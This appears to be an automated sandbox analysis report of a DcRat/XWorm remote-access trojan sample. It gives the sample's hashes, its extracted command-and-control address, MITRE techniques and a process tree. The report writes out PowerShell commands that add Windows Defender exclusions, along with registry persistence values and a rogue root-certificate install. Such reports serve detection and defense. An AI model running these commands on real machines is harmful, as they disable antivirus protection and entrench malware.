dcrat | 264cfa973e4a1b05c208728074dc9b072c180502494644d324086ba66f791c7c

Analysis

max time kernel
120s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19/01/2025, 13:39 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dettex.exe
Size

90KB
MD5

1c2a253948135b876e3fe148f45040f1
SHA1

c546d4e05316819469003b332b4bd2a9c4e5f5fd
SHA256

264cfa973e4a1b05c208728074dc9b072c180502494644d324086ba66f791c7c
SHA512

b8e2887c5a7562a001ed013aee2f747aae3e916c85810aff2e857272f75be6c06fd8774a4c2d3676a6fe60dce57f4f9f223092f69036dde4378b71ed9fae7b7f
SSDEEP

1536:4xnmcCQLrqkUScY177xIO0bOU5pXZX8b60/S/OPEp9QcmzhRaA5am:MmWn9Uy76ZbHp8/2O49IFRN5am

Score

10^/10

dcrat xworm discovery execution infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:22100

wide-casting.gl.at.ply.gg:22100

Attributes

Install_directory
%AppData%
install_file
Dettex.exe

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/328-1-0x0000000000EA0000-0x0000000000EBC000-memory.dmp	family_xworm
behavioral1/files/0x000a000000015d2e-176.dat	family_xworm

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Recovery\\1b8b1de2-69f6-11ef-9774-62cb582c238c\\WmiPrvSE.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Recovery\\1b8b1de2-69f6-11ef-9774-62cb582c238c\\WmiPrvSE.exe\", \"C:\\MSOCache\\All Users\\services.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Recovery\\1b8b1de2-69f6-11ef-9774-62cb582c238c\\WmiPrvSE.exe\", \"C:\\MSOCache\\All Users\\services.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\spoolsv.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Recovery\\1b8b1de2-69f6-11ef-9774-62cb582c238c\\WmiPrvSE.exe\", \"C:\\MSOCache\\All Users\\services.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\spoolsv.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Dettex.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Recovery\\1b8b1de2-69f6-11ef-9774-62cb582c238c\\WmiPrvSE.exe\", \"C:\\MSOCache\\All Users\\services.exe\", \"C:\\Program Files (x86)\\Common Files\\Services\\spoolsv.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Dettex.exe\", \"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default User\\dllhost.exe\""	hyperSurrogateagentCrt.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2152	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2712	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1532	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2624	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1840	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2884	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2640	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1852	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2896	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2648	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2188	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1356	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	660	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	788	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1972	324	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1392	324	schtasks.exe	30

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
592	powershell.exe
2824	powershell.exe
2912	powershell.exe
1244	powershell.exe
1960	powershell.exe
1524	powershell.exe
2804	powershell.exe
2576	powershell.exe
848	powershell.exe
1204	powershell.exe

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dettex.lnk	Dettex.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dettex.lnk	Dettex.exe

Executes dropped EXE 3 IoCs

pid	Process
1568	CJRY2NU40N3R74B.exe
2436	hyperSurrogateagentCrt.exe
2692	WmiPrvSE.exe

Loads dropped DLL 2 IoCs

pid	Process
2980	cmd.exe
2980	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dettex = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Dettex.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\hyperSurrogateagentCrt = "\"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Dettex = "C:\\Users\\Admin\\AppData\\Roaming\\Dettex.exe"	Dettex.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default User\\dllhost.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\MSOCache\\All Users\\services.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files (x86)\\Common Files\\Services\\spoolsv.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Dettex = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\Dettex.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hyperSurrogateagentCrt = "\"C:\\HypercomponentCommon\\hyperSurrogateagentCrt.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default User\\dllhost.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Recovery\\1b8b1de2-69f6-11ef-9774-62cb582c238c\\WmiPrvSE.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Recovery\\1b8b1de2-69f6-11ef-9774-62cb582c238c\\WmiPrvSE.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\MSOCache\\All Users\\services.exe\""	hyperSurrogateagentCrt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files (x86)\\Common Files\\Services\\spoolsv.exe\""	hyperSurrogateagentCrt.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
18	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSC2E69B58315646D698906C5467A14A6.TMP	csc.exe
File created	\??\c:\Windows\System32\wa0wg5.exe	csc.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\Services\spoolsv.exe	hyperSurrogateagentCrt.exe
File created	C:\Program Files (x86)\Common Files\Services\f3b6ecef712a24	hyperSurrogateagentCrt.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CJRY2NU40N3R74B.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Dettex.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Dettex.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Dettex.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2712	schtasks.exe
1840	schtasks.exe
1808	schtasks.exe
2640	schtasks.exe
2648	schtasks.exe
1392	schtasks.exe
1532	schtasks.exe
2884	schtasks.exe
1852	schtasks.exe
2188	schtasks.exe
1356	schtasks.exe
660	schtasks.exe
788	schtasks.exe
2152	schtasks.exe
2788	schtasks.exe
2624	schtasks.exe
2896	schtasks.exe
1972	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
592	powershell.exe
2804	powershell.exe
2824	powershell.exe
2576	powershell.exe
328	Dettex.exe
328	Dettex.exe
328	Dettex.exe
328	Dettex.exe
328	Dettex.exe
328	Dettex.exe
328	Dettex.exe
328	Dettex.exe
328	Dettex.exe
328	Dettex.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe
2436	hyperSurrogateagentCrt.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	328	Dettex.exe
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	328	Dettex.exe
Token: SeDebugPrivilege	2436	hyperSurrogateagentCrt.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	1244	powershell.exe
Token: SeDebugPrivilege	1204	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	2692	WmiPrvSE.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
328	Dettex.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 328 wrote to memory of 592	328	Dettex.exe	32
PID 328 wrote to memory of 592	328	Dettex.exe	32
PID 328 wrote to memory of 592	328	Dettex.exe	32
PID 328 wrote to memory of 2804	328	Dettex.exe	34
PID 328 wrote to memory of 2804	328	Dettex.exe	34
PID 328 wrote to memory of 2804	328	Dettex.exe	34
PID 328 wrote to memory of 2824	328	Dettex.exe	36
PID 328 wrote to memory of 2824	328	Dettex.exe	36
PID 328 wrote to memory of 2824	328	Dettex.exe	36
PID 328 wrote to memory of 2576	328	Dettex.exe	38
PID 328 wrote to memory of 2576	328	Dettex.exe	38
PID 328 wrote to memory of 2576	328	Dettex.exe	38
PID 328 wrote to memory of 1568	328	Dettex.exe	40
PID 328 wrote to memory of 1568	328	Dettex.exe	40
PID 328 wrote to memory of 1568	328	Dettex.exe	40
PID 328 wrote to memory of 1568	328	Dettex.exe	40
PID 1568 wrote to memory of 2104	1568	CJRY2NU40N3R74B.exe	41
PID 1568 wrote to memory of 2104	1568	CJRY2NU40N3R74B.exe	41
PID 1568 wrote to memory of 2104	1568	CJRY2NU40N3R74B.exe	41
PID 1568 wrote to memory of 2104	1568	CJRY2NU40N3R74B.exe	41
PID 2104 wrote to memory of 2980	2104	WScript.exe	42
PID 2104 wrote to memory of 2980	2104	WScript.exe	42
PID 2104 wrote to memory of 2980	2104	WScript.exe	42
PID 2104 wrote to memory of 2980	2104	WScript.exe	42
PID 2980 wrote to memory of 2436	2980	cmd.exe	44
PID 2980 wrote to memory of 2436	2980	cmd.exe	44
PID 2980 wrote to memory of 2436	2980	cmd.exe	44
PID 2980 wrote to memory of 2436	2980	cmd.exe	44
PID 2436 wrote to memory of 2888	2436	hyperSurrogateagentCrt.exe	48
PID 2436 wrote to memory of 2888	2436	hyperSurrogateagentCrt.exe	48
PID 2436 wrote to memory of 2888	2436	hyperSurrogateagentCrt.exe	48
PID 2888 wrote to memory of 2744	2888	csc.exe	50
PID 2888 wrote to memory of 2744	2888	csc.exe	50
PID 2888 wrote to memory of 2744	2888	csc.exe	50
PID 2436 wrote to memory of 2600	2436	hyperSurrogateagentCrt.exe	51
PID 2436 wrote to memory of 2600	2436	hyperSurrogateagentCrt.exe	51
PID 2436 wrote to memory of 2600	2436	hyperSurrogateagentCrt.exe	51
PID 2600 wrote to memory of 2652	2600	csc.exe	53
PID 2600 wrote to memory of 2652	2600	csc.exe	53
PID 2600 wrote to memory of 2652	2600	csc.exe	53
PID 2436 wrote to memory of 2912	2436	hyperSurrogateagentCrt.exe	69
PID 2436 wrote to memory of 2912	2436	hyperSurrogateagentCrt.exe	69
PID 2436 wrote to memory of 2912	2436	hyperSurrogateagentCrt.exe	69
PID 2436 wrote to memory of 848	2436	hyperSurrogateagentCrt.exe	70
PID 2436 wrote to memory of 848	2436	hyperSurrogateagentCrt.exe	70
PID 2436 wrote to memory of 848	2436	hyperSurrogateagentCrt.exe	70
PID 2436 wrote to memory of 1244	2436	hyperSurrogateagentCrt.exe	71
PID 2436 wrote to memory of 1244	2436	hyperSurrogateagentCrt.exe	71
PID 2436 wrote to memory of 1244	2436	hyperSurrogateagentCrt.exe	71
PID 2436 wrote to memory of 1960	2436	hyperSurrogateagentCrt.exe	72
PID 2436 wrote to memory of 1960	2436	hyperSurrogateagentCrt.exe	72
PID 2436 wrote to memory of 1960	2436	hyperSurrogateagentCrt.exe	72
PID 2436 wrote to memory of 1204	2436	hyperSurrogateagentCrt.exe	73
PID 2436 wrote to memory of 1204	2436	hyperSurrogateagentCrt.exe	73
PID 2436 wrote to memory of 1204	2436	hyperSurrogateagentCrt.exe	73
PID 2436 wrote to memory of 1524	2436	hyperSurrogateagentCrt.exe	76
PID 2436 wrote to memory of 1524	2436	hyperSurrogateagentCrt.exe	76
PID 2436 wrote to memory of 1524	2436	hyperSurrogateagentCrt.exe	76
PID 2436 wrote to memory of 1600	2436	hyperSurrogateagentCrt.exe	80
PID 2436 wrote to memory of 1600	2436	hyperSurrogateagentCrt.exe	80
PID 2436 wrote to memory of 1600	2436	hyperSurrogateagentCrt.exe	80
PID 1600 wrote to memory of 1624	1600	cmd.exe	83
PID 1600 wrote to memory of 1624	1600	cmd.exe	83
PID 1600 wrote to memory of 1624	1600	cmd.exe	83

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Dettex.exe
"C:\Users\Admin\AppData\Local\Temp\Dettex.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Dettex.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Dettex.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Dettex.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Dettex.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2576
- C:\Users\Admin\AppData\Local\Temp\CJRY2NU40N3R74B.exe
  "C:\Users\Admin\AppData\Local\Temp\CJRY2NU40N3R74B.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1568
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2980
    - - C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
        
        "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2436
